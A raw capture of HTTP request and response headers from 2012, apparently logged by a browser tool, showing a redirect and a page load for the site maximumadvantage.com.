Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=9g2e44eksq4ckc4ohgu5ag31j4
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Wed, 07 Nov 2012 08:55:26 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Location: http://www.maximumadvantage.com/
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
GET / HTTP/1.1

Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=9g2e44eksq4ckc4ohgu5ag31j4
HTTP/1.1 200 OK

Content-Type: text/html
Date: Wed, 07 Nov 2012 08:55:26 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked